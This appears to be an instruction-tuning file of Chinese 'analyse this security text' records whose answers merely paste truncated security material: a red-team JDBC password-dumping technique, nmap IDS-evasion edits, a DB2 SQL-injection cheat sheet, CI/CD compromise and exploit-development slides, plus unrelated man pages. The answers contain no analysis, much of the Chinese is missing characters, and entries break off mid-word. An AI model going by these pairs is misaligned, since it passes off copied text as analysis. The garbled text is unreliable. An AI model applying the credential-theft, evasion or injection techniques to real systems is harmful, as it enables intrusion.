{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ACL --- ## 什么是 ACL windows 系统中的 ACL(Access Control List)用来表示组与用户权限的列表比如文件注册表的权限都包括 ACL它用来表示哪些组与用户具有操作权限其实主要是一组规则定义哪些组与用户等对特定 AD 对象具有哪些权限 **ACL** Access Control List用来表示用户组权限的列表包括 DACL 和 SACL **ACE** Access Control EntryACL 中的元素 **DACL** Discretionary Access Control List用来表示安全对象权限的列表 **SACL** System Access Control List用来记录对安全对象访问的日志 --- 具体实现对某个文件进行访问系统将做以下判断 - 无 DACL系统将允许访问也就是系统内的所有组与用户都没有做限制 - 有 DACL无 ACE系统将拒绝所有访问也就是系统内的组与用户有限制但是没有 ACE 也就是不允许任何操作 - 有 DACL有 ACE将就是按照 ACE 的内容去执行相应组与用户的限制只有对应的 ACE 可以进行操作 查看文件的 ACL 选择一条 DACL 包含多个 ACE表示具有的权限如下 --- ## 针对 ACL 的操作 ### icacls 操作 ACL 查看指定文件的 ACL ``` icacls C:\\test.txt ``` 其中(OI)代表对象继承 (CI)代表容器继承 (F)代表完全访问 备份指定文件 (包括当前目录及其子目录中的文件) 的 ACL ``` icacls C:\\test.txt /save AclFile /t ``` 还原指定文件(包括当前目录及其子目录中的文件)的ACL(注意这里还原的路径需要为先前备份的路径的上一级) ``` icacls C:\\ /restore AclFile /t ``` 添加用户对指定文件的完全访问权限 ``` icacls C:\\test.txt /grant test:(OI)(CI)(F) /t ``` 移除用户对指定文件(包括当前目录及其子目录中的文件)的完全访问权限 ``` icacls C:\\test.txt /remove test1 /t ``` --- ### powershell 操作 ACL 查看指定路径的ACL ``` Get-Acl -Path 'C:\\test'| Format-Table -wrap ``` 添加用户 test1 对指定文件的完全访问权限 ``` function Add-ACL{ [CmdletBinding()] Param ( [Parameter(Mandatory = $True)] [String] [ValidateNotNullOrEmpty()] $Path ) $acl = Get-Acl -Path $Path $person = [System.Security.Principal.NTAccount]\"test1\" $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\" $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\" $propagation = [System.Security.AccessControl.PropagationFlags]\"None\" $type = [System.Security.AccessControl.AccessControlType]\"Allow\" $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( ` $person,$access,$inheritance,$propagation,$type) $acl.AddAccessRule($rule) Set-Acl $Path $acl } Add-ACL -Path 'C:\\test' ``` 移除用户 test1 对指定文件的完全访问权限 ``` function Remove-ACL{ [CmdletBinding()] Param ( [Parameter(Mandatory = $True)] [String] [ValidateNotNullOrEmpty()] $Path ) $acl = Get-Acl -Path $Path $person = [System.Security.Princip", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJDBC内存Dump密码 - 1 JDBC内存Dump密码 引 在红队动中经常会遇到拿到 Webshell 后找不到数据库密码存放位置或者是数据库密码被加密的情况(需要逆向代码查找解密逻辑) 在此提出两种在从运时获取所有的数据库连接信息(密码)的式 第种式实现效果 服务端数据库加密 Demo 成功获取到解密后的数据库密码 插件已经集成到哥斯拉 https://github.com/BeichenDream/Godzilla/releases/ JDBC内存Dump密码 - 2 实现原理式 般不使数据库连接池情况下 我们通常使 Java 的类 DriverManager 获取数据库连接 Java 跟进逻辑 Java 从 getConnection 的具体实现逻辑来看 主要是从静态变量 registeredDrivers 变量遍历所有已经注册的数据库驱动并调数据库驱动的 connect 法获取数据库连接 如果数据库驱动返回 NULL 或抛出异常则再次循环 如果数据库驱动返回 Connection 则退出循环返回数 据库连接 这个时候我们就可以想到假如我们注册个数据库驱动上去是不是就能获取到数据库密码了 实现代码如下 这需要注意两点 . 在遍历 registeredDrivers 时会调 isDriverAllowed 法判断调者的 ClassLoader 是否为数据库驱动的 ClassLoader 级或者 同级 Java 为什么这么设计呢 因为获取数据库驱动涉及到了双亲委派相关的知识 这举例 A,B ClassLoader,如果 A 加载了个数据 库驱动, B 获取到 A 的加载数据库驱动 会导致在 A 被 GC 回收的时候会因为 B 引了 A 导致 A 不会被释放 所以如果我们想获取当前 进程所有的容器的数据库密码 我们需要把我们的驱动加载到系统类上 DriverManager.getConnection(DB_URL,userName,aes(password)); @CallerSensitive public static Connection getConnection(String url,String user, String password) private static Connection getConnection(String url, . java util.Properties info, Class<?> caller) JDBC内存Dump密码 - 3 . 我们要把我们的数据库驱动放在第位 很简单是吧 有了这个东东我们不需要再反编译代码去找密钥了 但是这种法只适于调 Java 官提供的 DriverManager 类 实现原理 在上我们知道数据库驱动都要兼容 JDBC 的接也就是要实现 Driver 接 第三数据库连接池也遵守了 JDBC 的规则 数据库连接池会调对于驱动的 Driver.connect 法获取数据库连接 所以我们可以使 Java Agent 直接去 hook 所有已经实现了 Driver 接的类 代码已开源在 Github bingo 输命令 java -jar DatabaseInject.jar list 获取所有正在运的 JVM 找到要注的进程 这以 tomcat 为例(什么都可以注只要是实现了 jdbc 的接) 再次刷新访问数据库 https://github.com/BeichenDream/InjectJDBC JDBC内存Dump密码 - 4 成功的获取了数据库解密后的密码", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"CLUSTER\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME CLUSTER \\- 根据一个索引对某个表集簇 .SH SYNOPSIS .sp .nf CLUSTER \\fIindexname\\fR ON \\fItablename\\fR CLUSTER \\fItablename\\fR CLUSTER .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBCLUSTER\\fR 指示PostgreSQL 基于索引 indexname 的度量对表 table 进行存储建簇索引必须已经在表 tablename. 上定义 .PP 当对一个表建簇后该表的物理存储将基于索引信息进行 建簇是一次性操作也就是说当表随后被更新后改变的内容不会建簇 也就是说系统不会试图按照索引顺序对更新过的记录重新建簇 如果需要可以通过周期性地手工执行该命令的方法重建簇 .PP 在对一个表建簇之后PostgreSQL 会记忆在哪个索引上建立的簇 CLUSTER tablename 的形式就在表以前建簇的同一个索引上建簇 .PP 没有任何参数的 \\fBCLUSTER\\fR 将导致当前数据库里所有调用它的用户所有的表都被建簇 绝不会对不包括进来的表建簇这种形式的 CLUSTER 不能在一个事务或者函数里面调用 .PP 在对一个表进行建簇的时候则在其上请求一个 ACCESS EXCLUSIVE 锁 这样就避免了在 CLUSTER 完成之前执行任何其他的数据库操作包括读写 参阅 Section 12.3 获取有关数据库锁定的更多信息 .SH \"PARAMETERS 参数\" .TP \\fB\\fIindexname\\fB\\fR 一个索引名称 .TP \\fB\\fItablename\\fB\\fR 准备建簇的表的名称可能有模式修饰 .SH \"NOTES 注意\" .PP 如果你只是随机的访问表中的行 那么在堆表中的数据的实际存储顺序是无关紧要的 但是如果你对某些数据的访问多于其他数据 而且有一个索引将这些数据分组那你就将从使用 CLUSTER 中获益 如果你从一个表中请求一定索引范围的值 或者是一个索引过的值对应多行 CLUSTER 也会有助于应用 因为如果索引标识出第一匹配行所在的堆存储页所有其他行也可能已经在同一堆存储页里了 这样便节省了磁盘访问的时间加速了查询 .PP 在这个建簇的操作过程中系统先创建一个按照索引顺序建立的表的临时拷贝 同时也建立表上的每个索引的临时拷贝因此你需要磁盘上有足够的剩余空间 至少是表大小和索引大小的和 .PP 因为 CLUSTER 记忆建簇信息我们可以在第一次的时候手工对表进行建簇 然后设置一个类似 VACUUM 的时间 这样我们就可以周期地自动对表进行建簇了 .PP 因为规划器记录着有关表的排序的统计所以我们建议在新近建簇的表上运行 ANALYZE 否则规划器可能会选择很差劲的查询规划 .PP 还有一种建簇的方法 CLUSTER 命令将原表按你声明的索引重新排列 这个动作在操作大表时可能会很慢 因为每一行都从堆存储页里按索引顺序取出如果存储页表没有排序 整个表是随机存放在各个页面的因而移动的每一行都要进行一次磁盘页面操作 PostgreSQL 有一个缓冲 但一个大表的主体是不可能都放到缓冲去的 另外一种对表建簇的方法是 .sp .nf CREATE TABLE \\fInewtable\\fR AS SELECT \\fIcolumnlist\\fR FROM \\fItable\\fR ORDER BY \\fIcolumnlist\\fR; .sp .fi 这个用法使用PostgreSQL 排序的代码 ORDER BY 来创建一个需要的顺序在对未排序的数据操作时通常速度比索引扫描快得多 然后你可以删除旧表用 ALTER TABLE ... RENAME将 newtable 改成旧表名 并且重建该表所有索引但是这个方法不保留 OID约束外键关系 赋予的权限以及表的其它附属的属性 ---- 所有这些属性都必须手工重建 .SH \"EXAMPLES 例子\" .PP 以雇员的 emp_ind 属性对employees关系建簇 .sp .nf CLUSTER emp_ind ON emp; .sp .fi .PP 使用以前用过的同一个索引对employees表进行建簇 .sp .nf CLUSTER emp; .sp .fi .PP 对以前建过簇的所有表进行建簇 .sp .nf CLUSTER; .sp .fi .SH \"COMPATIBIL", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHybrid rule-based botnet detection approach using machine learning for analysing DNS traffic Saif Al-mashhadi1,2, Mohammed Anbar1, Iznan Hasbullah1 and Taief Alaa Alamiedy1,3 1 National Advanced IPv6 Centre, Universiti Sains Malaysia, Penang, Malaysia 2 Electrical Engineering, University of Baghdad, Baghdad, Baghdad, Iraq 3 ECE Department- Faculty of Engineering, University of Kufa, Kufa, Najaf, Iraq ABSTRACT Botnets can simultaneously control millions of Internet-connected devices to launch damaging cyber-attacks that pose significant threats to the Internet. In a botnet, bot- masters communicate with the command and control server using various communication protocols. One of the widely used communication protocols is the Domain Name System (DNS) service, an essential Internet service. Bot-masters utilise Domain Generation Algorithms (DGA) and fast-flux techniques to avoid static blacklists and reverse engineering while remaining flexible. However, botnets DNS communication generates anomalous DNS traffic throughout the botnet life cycle, and such anomaly is considered an indicator of DNS-based botnets presence in the network. Despite several approaches proposed to detect botnets based on DNS traffic analysis; however, the problem still exists and is challenging due to several reasons, such as not considering significant features and rules that contribute to the detection of DNS-based botnet. Therefore, this paper examines the abnormality of DNS traffic during the botnet lifecycle to extract significant enriched features. These features are further analysed using two machine learning algorithms. The union of the output of two algorithms proposes a novel hybrid rule detection model approach. Two benchmark datasets are used to evaluate the performance of the proposed approach in terms of detection accuracy and false-positive rate. The experimental results show that the proposed approach has a 99.96% accuracy and a 1.6% false- positive rate, outperforming other state-of-the-a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise Iain Smart & Viktor Gazdag #BHUSA @BlackHatEvents Information Classification: General WhoAreWe Iain Smart (@smarticu5) NCC Group Containerisation Practice Lead 6 years Container & Cloud Pentesting Viktor Gazdag (@wucpi) Jenkins Security MVP, Cloud Research Group Lead 7 years Pentest - Internal & External Team #BHUSA @BlackHatEvents Information Classification: General Terminology CI  Continuous Integration CD  Continuous Development/Deployment Pipeline  A task or series of tasks performed automatically Secrets  Something sensitive you wouldnt want to be made public (e.g. a password) RCE  Remote Code Execution @smarticu5 & @wucpi RCE-As-A-Service #BHUSA @BlackHatEvents Information Classification: General CI/CD Overview @smarticu5 & @wucpi RCE-As-A-Service #BHUSA @BlackHatEvents Information Classification: General CI/CD Overview @smarticu5 & @wucpi RCE-As-A-Service #BHUSA @BlackHatEvents Information Classification: General Attackers View Code goes in, apps come out Pipelines have network access to a range of environments Pipelines have credentials to pull dependencies and push artifacts Free compute resources @smarticu5 & @wucpi RCE-As-A-Service #BHUSA @BlackHatEvents Scenarios #BHUSA @BlackHatEvents Information Classification: General Developers Access @smarticu5 & @wucpi RCE-As-A-Service #BHUSA @BlackHatEvents Information Classification: General Git Access Granted developer access to an internal Bitbucket repo @smarticu5 & @wucpi RCE-As-A-Service #BHUSA @BlackHatEvents Information Classification: General Git Access > Load Dependencies Apache Maven Project Could modify project dependencies Hosted dependency on an attacker-controlled URL @smarticu5 & @wucpi RCE-As-A-Service #BHUSA @BlackHatEvents Information Classification: General Git Access > Load Dependencies > Jenkins Runner Shell Meterpreter shell from Jenkins runner Limited environment means easy recon Fo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n[Nu1L] writup-for-Alictf-2016 MISC coloroverflow 首先感觉这种包名不像是 CTF 用的所以直接 Google 之发现是 Google Play 上开源的游戏 Color Overflow于是下载下来进行比对发现多出了几个类无法匹配上原 apk所以猜测是 自己后加的分别将多出的类分析之后发现分别是用语发送请求生成请求和工具类我 将其命名为 LogClassn 和 Utils 程序将请求生成之后向 log.godric.me 发送 POST 请求在代码里发现数据发送之前用经过了 GZIP 压缩在 pcap 中也发现了这个请求pcap 里显示确实有 Content-Encoding: gzip用 wireshark 导出 http 数据得到了原始数据 现 在 从 LogClass 往 上 找  发 现 GameView$1 里 的 new LogClass().execute(new ByteArrayOutputStream[]{v2.OutputRequestBody()});会调用 n 中的方法然后 LogClass 里的 run 会发送 public ByteArrayOutputStream OutputRequestBody() { try { this.output_stream.reset(); f.a(this.output_stream, this.szId); f.a(this.output_stream, this.CurMill); f.a(this.output_stream, this.Rand); f.a(this.output_stream, this.d); this.output_stream.flush(); } catch(Exception v0) { v0.printStackTrace(); } return this.output_stream; } 其中 d 是由要发送的数据进行 AES 加密后得到的在 GetRequestBody 这个方法中 这部分缓存了要发送的数据a 方法有三个重载都将输出到缓冲区分别会先输出对应的 类型标志2118 和 24接下来字符串类型会字符串长度然后输出字符串字节数组 会输出一个字节表示长度然后输出所有字节长整型会按 7 位分组然后高位作为结尾标 志每次输出一个字节高位为 0 表示结束 因此我们可以从 pcap 导出的数据中还原出 szId, CurMil, Rand, d szId 被计算 MD5 后摘要作为 key未编码成十六进制字符串Rand 和 CurMill 进行循环 异或得到 IV因此 key 和 IV 也可以计算出来 再来看 AES if(i == 0) { int j; for(j = 0; j < block_size; ++j) { block[j] = ((byte)(padded_input[j]  arg13[j])); } } else { int j; for(j = 0; j < block_size; ++j) { block[j] = ((byte)(padded_input[i * 16 + j]  block_out[j])); } } block_out = AES.EncryptBlock(block); System.arraycopy(block_out, 0, outbuf, i * 16, block_size); 这部分看出该 AES 将上一轮的输出和输入进行异或再加密因此是 CBC 模式 还原出 IV 和 key还有 encrypted 之后便可以进行解密解密出来发现其中包含 flag szid = 'bb39b07060deabd5' curmill = [0xb9, 0xe8, 0xf3, 0xd3, 0xca, 0x2a] curmill = [i & (~128) for i in curmill] curmill = sum([curmill[i] << (7*i) for i in range(len(curmill))]) print curmill rand = '46 51 4b f9 f2 b3 cd 3b f5 80 b7 cd 9b ae 45 14'.split() rand = [int(i, 16) for i in rand] import md5 m = md5.md5() m.update(szid) key = m.digest() print 'key', map(ord, key) IV = [(curmill >> (i*8)) & 255 for i in range(8)][::-1] IV = [ra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncat /config/etc/sangfor/ssl/httpd.conf | grep -e \"\\s*LoadModule\"   mpm_worker_module modules/mod_mpm_worker.so // -httpd.conf 0x00 httpd.conf auth_kerb_module modules/mod_auth_kerb.so //kerberos authn_core_module modules/mod_authn_core.so //httpbasicldap authz_user_module modules/mod_authz_user.so // authz_core_module modules/mod_authz_core.so // access_compat_module modules/mod_access_compat.so //ip auth_basic_module modules/mod_auth_basic.so //basic socache_shmcb_module modules/mod_socache_shmcb.so // reqtimeout_module modules/mod_reqtimeout.so // filter_module modules/mod_filter.so // deflate_module modules/mod_deflate.so // mime_module modules/mod_mime.so // env_module modules/mod_env.so //apache expires_module modules/mod_expires.so // headers_module modules/mod_headers.so // setenvif_module modules/mod_setenvif.so //cgi proxy_module modules/mod_proxy.so // ssl_module modules/mod_ssl.so //sslv3tls v1.x unixd_module modules/mod_unixd.so // dir_module modules/mod_dir.so // alias_module modules/mod_alias.so //aliasscriptalias rewrite_module modules/mod_rewrite.so //url LoadModule proxy_http_module modules/mod_proxy_http.so //http LoadModule svpn_web_module modules/mod_svpn_web.so //proxy twf_module modules/mod_twf.so mdm_module modules/mod_mdm.so regex_module modules/mod_regex.so mvcon_module modules/mod_mvcon.so comm_check_module modules/mod_comm_check.so // service_downgrade_module modules/mod_service_downgrade.so // DocumentRoot \"/sf/app/apache_portal/htdocs\" <Directory \"/sf/app/apache_portal/htdocs\"> Options -Indexes +FollowSymLinks AllowOverride None Require all granted </Directory> <IfModule proxy_module> ProxyRequests Off ProxyBadHeader Ignore <Directory proxy:*> Order deny,allow Deny from all Allow from 127.0.0.1 </Directory> </IfModule> <IfModule dir_module> DirectoryIndex index.csp index.sin index.html </IfModule> ScriptAlias /cgi-bin/ \"/sf/app/apache_portal/cgi-bin/\" <FilesMatch \"\\.tml\"> Require all denied </FilesMatch>  svpn_web_module modules/mod_svpn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStealing Identity Management Systems Part I: Background of Identity Management systems, and some philosiphy on attacking them What are identity Management Systems? Theory of IDM Some specific products Some common configurations Theory of IDM The system connecting two or more systems that hold Identities (some concept of a physical or logical user) Continuously manage those Identities based on a set of business rules Management of the identity throughout the lifecycle of the identity Provisioning => Granting / Revoking privileges and changing Authentication tokens => Deprovisioning All done in a way that can be proved and audited Some specific products Novell Identity Manager Microsoft Identity Integration Server Sun Java System Identity Manager CA Identity Manager IBM Tivoli Identity Manager Who's running IDM? * Allianz Suisse, Allied Irish Bank, Alvarado Independent School District, America First Credit Union, American National Standards Institute, Bezirk Oberbayern, Bezirk Oberbayern, Bridgepoint Health, Catholic Healthcare West, City of Peterborough, Continuum Health Partners, Coop, De Montfort University, Department of Enterprise, Trade & Employment (DETE), Deutsche Annington * - This is just from Novell's list of succes stories: http://www.novell.com/servlet/CRS?reference_name=&- op=%25&Action=Start+Search&Submit=Start+Search&source=novl&full_text_limit=showcase_verbiage+%2C+press_ release&MaxRows=0&&solutions=4&&language_id=0&region_id=0&country_id=0&industry=0 Who's running IDM? Eastern Michigan University, Fairchild Semiconductor, Fairfax County Public Schools, Furukawa Electric, GEHE, GKB, Gundersen Lutheran, Indiana State University, James Richardson International, JohnsonDiversey, Kanton Thurgau, Leiden University, Macmahon Holdings Ltd, Maine Medical Center, Miyazaki Prefectural Office, National Health Service (NHS), Municipality of Baerum, Nevada Department of Corrections, North Kansas City School District, Ohio Office of the Attorney General Who's runn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndigita security Fire & Ice making and breaking mac firewalls WHOIS cybersecurity solutions for the macOS enterprise @patrickwardle synack digita nsa nasa Outline making breaking macos firewalls socket filter } bugs bypasses } ipc, rules, alerts digita security MAKING A FIREWALL filtering network traffic The Goal to monitor all network traffic; blocking unauthorized traffic while allowing trusted (legitimate) connections we'll focus on outgoing traffic (as Apple's built-in firewall is sufficient for incoming) C&C server malware infects system malware attempts to connect to C&C server or exfil data firewall detects unauthorized connection, alerting user } generically no a priori knowledge LuLu github.com/objective-see/LuLu Network Kernel Extensions & socket filters \"Network kernel extensions (NKEs) provide a way to extend and modify the networking infrastructure of OS X\" -developer.apple.com Apple's Network Kernel Extensions Programming Guide Socket Filter (NKE) \"filter inbound or outbound traffic on a socket\" -developer.apple.com socket operation allowed kernel mode Registering a Socket Filter the sflt_filter structure \"A socket filter is registered by [first] filling out desired callbacks in the sflt_filter structure.\" OS X and iOS Kernel Programming struct sflt_filter { sflt_handle sf_handle; int sf_flags; char *sf_name; sf_unregistered_func sf_unregistered; sf_attach_func sf_attach; sf_detach_func sf_detach; sf_notify_func sf_notify; sf_getpeername_func sf_getpeername; sf_getsockname_func sf_getsockname; sf_data_in_func sf_data_in; sf_data_out_func sf_data_out; sf_connect_in_func sf_connect_in; sf_connect_out_func sf_connect_out; sf_bind_func sf_bind; sf_setoption_func sf_setoption; sf_getoption_func sf_getoption; .... struct sflt_filter (kpi_socketfilter.h) int sf_flags: set to SFLT_GLOBAL }callbacks (optional) attach data in/out detach Registering a Socket Filter the sflt_register function extern errno_t sflt_register(const struct sflt_filter *filter, int domain", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnmap去除指纹以及识别假端开放问题 0x00 前 最近在研究具链的组合使在络端扫描还是打算先集成下nmap这种牌的具再 结合其他些个性化具来解决些端扫描上的需求 这边先对nmap进些优化如去除明显的指纹降低被识别的险其次解决下因为防墙策 略导致批量假端开放的问题 0x01 去除指纹的思路 nmap等各类开源扫描器般来说都会有意意的引些请求特征如tcp请求的些选项配置 与正常请求不同如包含特定关键词的payload等针对nmap我们可以先参考下先知的这篇 章如何修改nmap 重新编译bypass emergingthreats 的公开ids规则记录了些 nmap的特征修改作为个开始是很不错的那么我们该如何找到更多的指纹以便于去除呢 根据先知这篇章我们可以把思路概放在这个地 1. 根据开源检测具的规则集来找针对的特征并定位特征件进修改 2. 在nmap等开源具源码中直接全量搜索疑似的关键词如Nmap 3. 针对性的对某种请求进wireshark抓包并对这种请求与可能的正常请求进对看看有没 有明显的区别 般来说通过从1和2点开始是最好的 从开源规则集 我这边先从开源IDS的snort以及suricata的规则集开始找寻相关的特征规则 下载规则集 打开后可以看到有堆规则具体语法可以参考官的档其实你不懂语法概看看也 能理解个概但是当我搜索nmap关键词时并没有发现规则集有针对nmap的特定规则可能是 因为这是开源社区的规则他并没有收录nmap的识别规则 不过仔细查找了下资料我在emergingthreats.net的站找到了nmap的规则集看起来是 专收录应急规则的站 我们在站搜索nmap可以看到收录了32条专社区规则于识别nmap通过对这些规则 我们可以像开头先知的章那样定位到已知的特征点并进更改 如这样条规则 alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:\"ET SCAN NMAP SQL Spider Scan\"; flow:established,to_server; content:\"GET\"; http_method; content:\" OR sqlspider\"; http_uri; reference:url,nmap.org/nsedoc/scripts/sql-injection.html; classtype:web-application-attack; sid:2013778; rev:2; metadata:created_at 2011_10_19, updated_at 2020_04_20;) 由于规则多个选项其实意味着AND的关系因此我们只需要改变其中个特征就了这可 以看到会去匹配内容中包含OR sqlspider 先搜下这个是哪个件包含的sqlspider 进 ./scripts/http-sql-injection.nse 替换sqlspider为任意字符串即可 从明显字符串 通过些规则我们可以看到nmap等开源扫描器很喜欢的名字做特征字符如我们搜 搜Nmap然后把些没有的注释什么的过滤掉看看 find . -name \"*.nse\" -type f | xargs grep -s \"Nmap\" 像这样我们在nse脚本搜带有nmap关键词的内容 在堆看起来都是没有的东眼看到了疑似特征的内容 编辑脚本定位查看 确实是特征在请求的ua写了Nmap字样因此我们把它修改成普通的UA 替换即可 类似的我们可以再找找如 看到个ssh探测的 看就是发送tcp包把nmap字样去掉就了 般来说只要在发送请求的函数或字段如senduseragent看到payload包含特定关 键词的这种通常就是特征把它替换掉即可 0x02 识别假端开放问题 我们经常会遇到些标存在些安全策略导致端扫描呈现全部开放的情况如 Host is up (0.25s latency). Not shown: 139 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp filtered ssh 23/tcp open telnet 25/tcp open smtp 42/tcp open nameserver 80/tcp open http 81/tcp open hosts2-ns 110/tcp open pop3 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 143/tcp open imap 443/tcp open https 445/tcp filtered microsoft-ds 465/tcp open smtps 593/tcp filtere", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypassing Android Password Manager Apps Without Root Stephan Huber, Siegfried Rasthofer, Steven Arzt Fraunhofer SIT 2 3 Stephan  Mobile Security Researcher at Fraunhofer SIT  Enjoys teaching students in Android (app) hacking  Twitter: @teamsik Siegfried  Head of Department Secure Software Engineering at Fraunhofer SIT  Founder of CodeInspect  Web: www.rasthofer.info  Twitter: @teamsik Acknowledgements  Benedikt Hiemenz  Daniel Hitzel  Daniel Magin  Joseph Varghese  Julien Hachenberger  Max Kolhagen  Michael Tröger  Philipp Roskosch  Wittmann Andreas 4 5 Wish 6 aim=e1Ioci Ohyoh>wae0 kei7Gae$si bei3coo<Li ooB,iu9AhN Phei0IeHa' uhu;j5ohTi Phi,Phu3di Moo0ooz\"oh we(u,t0Zas quucoo<d2I Pae?gh<ie3 loh;Bah4ei Wa[el~oh9i ooh!ee7Aik AX1aeSh>ai eGah+K5iuM yae$V4leex ohjiu_Hei6 fee'Cho5Oo jahK3Ad+ai oH)eewaec0 KiG&ee4ahy ujohj%ie1J wae,Gei6mu uSh=i2ahng ainai]Le2i Ieb~o5fohF ohN\\ah1gae Dooch\\ei7i ich]a're1U aiToh5cee= eiZ2thaip; ni\"W3oom?i oi(Sh7vie) gu}i8Tohco il@ah@ve9U cie\"tae8Eo Au&S3aigae eir0ieHo)c ohch/ah6Ii Bie*t9xie\" ukieTh6fu[ ie*vieZai9 ohwu(v0eeY ua&ghi7aeR em?ohG?oi3 phu$Lah4p ieX&i2shei aiZie%l7Oo ood8Pe<emo faiGh[ie0i OPho9sie>n phie9Ib(ie beiMei[r7a Nagh(aid0U AhTee:tah5 oY\"a5pheib ohthe1Na.e eria9Ahn>u eid8Ohso!o Uv4ia6Gu`o Aeli1li$i& Tothai8ph Euso6eu$ja vie8Ieh?ai leec4aeZ/o Eele+ph2na yai=b!a5Oo Wefoh&m4oh Vo-oX9ka0v ei9eenuN<a Eit}ae4ohF heRie.J6Bo OoZ-ue9mai zait8coo]N yoh9Oopoh$ xoh%C:ahk6 Zi]opu4eiB eGh>ih2oPh noo7Ish'ie Uaz6she|Zu oo0aiP*ee2 coh=Puo1Ve roo9Kee-th ra@c3Ce7sh mabi6Malo[ auw1Eu\\kie eiVoo,Kuu5 aiW\\oo5phu Oos_abir7U Reality 7 Note Password-Manager Password-Recycling Single Sign On 8 App GooglePlay Downloads Keeper 10  50 m Keepsafe 10  50 m 1Password 1  5 m Dashlane 1  5 m Lastpass 1  5 m Avast 0.5  1 m MyPasswords 0.5  1 m F-Secure 100  500 k PasswordManger 50  100 k 26 Vulnerabilities 9  Premium features for free  Resetting master password with ease  Breaking C.I.A without ROOT  Lost device scenario  Mitm attack  Via third party app 11 Prem", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DB2 Injection > ## Summary * [DB2 Cheatsheet](#db2-cheatsheet) * [References](#references) ## DB2 Cheatsheet ### Version ```sql select versionnumber, version_timestamp from sysibm.sysversions; select service_level from table(sysproc.env_get_inst_info()) as instanceinfo select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+) select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo select service_level,bld_level from sysibmadm.env_inst_info ``` ### Comments ```sql select blah from foo -- comment like this (double dash) ``` ### Current User ```sql select user from sysibm.sysdummy1 select session_user from sysibm.sysdummy1 select system_user from sysibm.sysdummy1 ``` ### List Users DB2 uses OS accounts ```sql select distinct(authid) from sysibmadm.privileges -- priv required select grantee from syscat.dbauth -- incomplete results select distinct(definer) from syscat.schemata -- more accurate select distinct(grantee) from sysibm.systabauth -- same as previous ``` ### List Privileges ```sql select * from syscat.tabauth -- shows priv on tables select * from syscat.tabauth where grantee = current user -- shows privs for current user select * from syscat.dbauth where grantee = current user;; select * from SYSIBM.SYSUSERAUTH  List db2 system privilegies ``` ### List DBA Accounts ```sql select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y' select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = Y or SYSADMAUTH = G ``` ### Current Database ```sql select current server from sysibm.sysdummy1 ``` ### List Databases ```sql select distinct(table_catalog) from sysibm.tables SELECT schemaname FROM syscat.schemata; ``` ### List Columns ```sql select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat ``` ### List Tables ```sql select table_name from sysibm.tables select name from sysibm.systables ``` ### Find Tables From Column Name ```sql select tbname from sysibm.syscolumns where name='us", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE JOP ROCKET: A SUPREMELY WICKED TOOL FOR JOP GADGET DISCOVERY, OR WHAT TO DO IF ROP IS TOO EASY Dr. Bramwell Brizendine Dr. Joshua Stroschein DEF CON 27 August 9, 2019 DR. BRAMWELL BRIZENDINE  Assistant Professor of Computer and Cyber Sciences at Dakota State University.  Creator of the JOP ROCKET.  Interests: Software exploitation, reverse engineering, malware analysis, offensive security.  Education:  2019: Ph.D in Cyber Operations  2016: M.S. in Applied Computer Science  2014: M.S. in Information Assurance  Contact:  Bramwell.Brizendine@dsu.edu DR. JOSH STROSCHEIN  Assistant Professor of Cyber Security and Network & Security Administration at Dakota State University  Teaches undergraduate and graduate courses in cyber security with a focus on malware analysis, reverse engineering, and software exploitation.  Regular trainer at many venues, such as DerbyCon, Hack-in-The-Box, BlackHat USA, and ToorCon.  Education:  2017: D.S. Cyber Security  2014: M.S. Information Assurance  Contact:  Joshua.Stroschein@dsu.edu ACKNOWLEDGEMENT  Austin Babcock  Undergraduate research assistant at Dakota State University.  Cyber Operations student.  Created JOP exploit chain for demo.  Contact:  Austin.Babcock@trojans.dsu.edu  Contact Austin with internship or job opportunities, etc.  Dr. Jared DeMott of VDA Labs  Member of Ph.D. dissertation committee. WHAT WE ARE GOING TO TALK ABOUT?  Remember ROP?  Lets try something a little bit different.  Introduction to Jump-Oriented Programming.  Getting to know the JOP ROCKET.  Some finer points of JOP exploit development.  See the magic of JOP in action. THE JOP ROCKET: DID WE INVENT JOP?  Certainly not.  The literature provides us with examples of JOP going back a decade: Bletsch; Chen, et al.; Erdődi; 